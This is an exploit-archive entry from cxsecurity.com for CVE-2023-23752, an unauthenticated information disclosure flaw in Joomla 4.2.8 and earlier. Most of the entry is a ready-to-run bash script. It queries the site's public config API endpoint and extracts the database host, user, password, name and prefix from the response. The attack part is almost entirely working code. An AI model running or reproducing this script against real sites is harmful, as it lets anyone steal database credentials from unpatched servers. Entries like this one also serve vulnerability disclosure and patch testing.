Joomla 4.2.8 Information Disclosure

2024.05.28
Credit: d4t4s3c
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

#!/bin/bash # Exploit Title: Joomla! <= 4.2.8 - Unauthenticated Information Disclosure # Date: 2024-05-21 # CVE: CVE-2023-23752 # Exploit Author: Miguel Redondo (aka d4t4s3c) # Vendor Homepage: https://www.joomla.org # Software Link: https://downloads.joomla.org # Version: <= 4.2.8 # Tested on: Linux # Category: Web Application while getopts ":u:" arg; do case ${arg} in u) url=${OPTARG}; let parameter_counter+=1 ;; esac done if [ -z "${url}" ]; then echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure" echo -e "\n[-] Usage: CVE-2023-23752.sh -u <url>\n" exit 1 else echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure" curl --silent --insecure "${url}/api/index.php/v1/config/application?public=true" > out.tmp echo -e "\n[i] Database info:\n" echo -e "[+] DB Type: $(sed -E 's/.*"dbtype":"([^"]+)".*/\1/' out.tmp)" echo -e "[+] DB Host: $(sed -E 's/.*"host":"([^"]+)".*/\1/' out.tmp)" echo -e "\e[92m[+] DB User: $(sed -E 's/.*"user":"([^"]+)".*/\1/' out.tmp)\e[0m" echo -e "\e[92m[+] DB Password: $(sed -E 's/.*"password":"([^"]+)".*/\1/' out.tmp)\e[0m" echo -e "[+] DB Name: $(sed -E 's/.*"db":"([^"]+)".*/\1/' out.tmp)" echo -e "[+] DB Prefix: $(sed -E 's/.*"dbprefix":"([^"]+)".*/\1/' out.tmp)" echo -e "[+] DB Encryptation: $(sed -E 's/.*"dbencryption":([0-9]+).*/\1/' out.tmp)\n" exit 0 fi


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top